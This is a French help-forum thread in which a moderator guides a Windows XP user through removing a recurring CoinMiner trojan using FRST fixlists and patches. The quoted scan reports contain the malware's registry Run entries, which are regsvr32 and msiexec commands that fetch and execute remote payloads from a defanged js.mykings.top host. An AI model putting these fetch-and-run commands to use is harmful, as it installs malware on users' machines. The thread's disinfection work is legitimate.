BAT/CoinMiner.Ru Trojan

Fermé
webdev - 28 août 2017 à 18:21
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017 - 8 sept. 2017 à 11:02
Bonjour,

Un grand merci d'avance,

je suis sur Windows XP pack3 / Firefox 52.0, mon antivirus Nod32 détecte à chaque démarrage de PC la présence d'un Trojan BAT/CoinMiner.Ru au niveau de c:\windows\debug\c2.bat créé par le fichier c:\windows\system32\wbem\scrcons.exe

Nod32 le supprime (cleaned by deleting), mais ce fichier revient à chaque démarrage :(

Quelqu'un peut m'aider de se débarrasser de ça !!!!

Merci encore
A voir également:

25 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
28 août 2017 à 18:34
Salut,

Ca fait penser à des miner qui vont par la vulnérabilité MS17-010
https://forum.malekal.com/viewtopic.php?t=57653

Pour voir :


Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
28 août 2017 à 18:59
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
Modifié le 28 août 2017 à 19:05
bingo, c'est bien un miner qui va par la vulnérabilité mentionnée, on retrouve le même type d'adresse : js.mykings.top

Le bon côté, c'est que les .Bat désactive SMB et parfois ajoute des règles sur le Fw de Windows pour te protéger =)
Toutefois, il faudrait installer ces mises à jour manuellement pour être sûr que la machine soit safe.

Je te donne la correction FRST, NOD32 devrait dégager les trucs qui ont été mis dans debug et wbem.
C'est souvent bien détecté.



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.



Veuillez appuyer sur une touche pour continuer la désinfection...
Voila merci:

Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (28-08-2017 18:10:31) Run:1
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal

==============================================

fixlist contenu:

CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 26494 B
Java, Flash, Steam htmlcache => 7530 B
Windows/system/dllcache/drivers => 177655280 B
Edge => 0 B
Chrome => 231449882 B
Firefox => 385544590 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 49780 B
All Users => 0 B
systemprofile => 88801617 B
LocalService => 10274610 B
NetworkService => 1564130 B
Ahmed => 59560319 B
Administrateur => 145524 B

RecycleBin => 0 B
EmptyTemp: => 910.8 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 18:12:22

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
29 août 2017 à 09:27
Termine par un nettoyage NOD32.
Installe bien les mises à jour.
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 10:46
Merci pour votre réponse,

je vais lancer Nod32, juste pour info ce matin lors de démarrage de PC j'ai eu l'info de Nod32 BAT/CoinMiner.Ru cleaned by deleting
c'est que ce Trojan est toujours là
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 17:50
Salut,

Nod32 n'a rien trouvé en scan, et le popup (BAT/CoinMiner.Ru cleaned by deleting) s'affiche de temps en temps. comme quoi le Trojan est toujours présent :(
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
29 août 2017 à 18:53
Tu as quoi comme fichiers dans ces dossiers ?
c:\windows\debug\
c:\windows\system32\wbem\

Tu as installé la mise à jour indiquée ?
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 19:08
Oui j'ai installer les mise à jour de nod32

c:\windows\debug\ usermode
c:\windows\debug\ WPD
c:\windows\debug\ blastcln.txt
c:\windows\debug\ mrt.txt
c:\windows\debug\ netsetup.txt
c:\windows\debug\ password.txt

et dans wbem il y a 7 dossiers et 150 fichiers

voila
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
29 août 2017 à 19:12
Je parlais de cette mise à jour en fait : https://www.microsoft.com/fr-FR/download/details.aspx?id=55245

dans c:\windows\system32\wbem\ , tu as des .exe ?
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 19:12
Que pense tu de cette ligne dans ADDITION.txt :

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 19:17
oui y a des .exe dans wbem
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
29 août 2017 à 19:20
comme ?
Installe la mise à jour, on va virer le WMI.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 19:29
Comme SCRCONS.exe c'est ce lui qui crée le c2.bat dans windows/debug
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
29 août 2017 à 19:31
il est légitime ce fichier, ça doit être la ligne wmi qui en est la source.
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
29 août 2017 à 19:37
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (29-08-2017 18:30:19) Run:2
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal

==============================================

fixlist contenu:

CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur non trouvé(e).
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur non trouvé(e).
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION => non trouvé(e)
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 8192 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/dllcache/drivers => 2073 B
Edge => 0 B
Chrome => 68328018 B
Firefox => 81625769 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 0 B
All Users => 0 B
systemprofile => 66228 B
LocalService => 66708 B
NetworkService => 692 B
Ahmed => 147975 B
Administrateur => 0 B

RecycleBin => 0 B
EmptyTemp: => 143.3 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 18:30:48

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
30 août 2017 à 11:54
cette suppression améliore les choses ?
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
30 août 2017 à 12:08
Oui, pour le moment je n'ai pas eu le popup (cleaned by deleting de nod32) j'espère qu'il est supprimé.

Merci bcp
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
30 août 2017 à 13:11
super =)
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 11:44
Bonjour,

Je reviens vers vous :(

j'ai eu 2 popup nod32 (BAT/CoinMiner.RU trojan cleaned by deleting) pour :
- C:\WINDOWS\DEBUG\c2.bat
- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\8Y1GZ2V2\close2[1].bat

voici la note que j'ai trouvé sur nod32:

BAT/CoinMiner.RU trojan;cleaned by deleting;AUTORITE NT\SYSTEM;Event occurred on a new file created by the application: C:\WINDOWS\system32\wbem\scrcons.exe (BFDF2820DF45266AA1D0EB887E84FE770E5F7452).;BEC02C55C98612EE716BB5956F68E0DD27CF0AFC;05/09/2017 10:16:42


Merci d'avance
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
Modifié le 5 sept. 2017 à 12:25
Salut,

Tu es vraiment certains d'avoir installé les mises à jour demandés?
Le pare-feu Windows fonctionne ?
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 12:31
Oui, j'ai installé les mises à jour demandés.
le pare-feu a été désactivé, je viens de l'activer maintenant
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 12:34
Vous voulez que je refais FRST, et post les rapports?
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
5 sept. 2017 à 13:05
Tu peux vas y.
0
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 13:10
en attendant tu peux voir ce lien ci-dessous, je vois que c'est WMI qui est le responsable de cette infection en relation avec scrcons.exe :

https://forum.eset.com/topic/12134-wmi-infections/
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 13:16
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
5 sept. 2017 à 13:26
L'entrée WMI est revenue.
C'est un portable ? tu le branches à différents endroits ?


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\WINDOWS\DEBUG\c2.bat
C:\WINDOWS\system32\wbem\scrcons.exe
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017
5 sept. 2017 à 13:31
portable? tu veux dire téléphone mobile, oui j'ai un samsung que je charge par ce PC et non pas sur d'autres

et c'est à cause de téléphone?
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 645
5 sept. 2017 à 14:26
non si c'est un ordinateur fixe de bureau ou un ordinateur portable.
0